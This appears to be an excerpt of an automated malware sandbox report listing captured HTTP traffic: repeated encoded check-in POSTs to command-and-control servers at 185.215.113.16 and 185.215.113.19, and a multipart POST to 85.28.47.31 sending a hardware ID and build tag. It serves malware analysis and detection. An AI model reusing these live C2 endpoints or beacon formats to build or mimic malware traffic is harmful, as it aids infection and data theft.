Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIEGDAEHIEHIDHJDAAKHost: 85.28.47.31Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 49 45 47 44 41 45 48 49 45 48 49 44 48 4a 44 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 31 42 42 30 41 46 41 33 31 36 44 33 33 39 32 32 35 39 37 34 39 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 47 44 41 45 48 49 45 48 49 44 48 4a 44 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 47 44 41 45 48 49 45 48 49 44 48 4a 44 41 41 4b 2d 2d 0d 0a Data Ascii: ------CFIEGDAEHIEHIDHJDAAKContent-Disposition: form-data; name="hwid"A1BB0AFA316D3392259749------CFIEGDAEHIEHIDHJDAAKContent-Disposition: form-data; name="build"sila------CFIEGDAEHIEHIDHJDAAK--
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
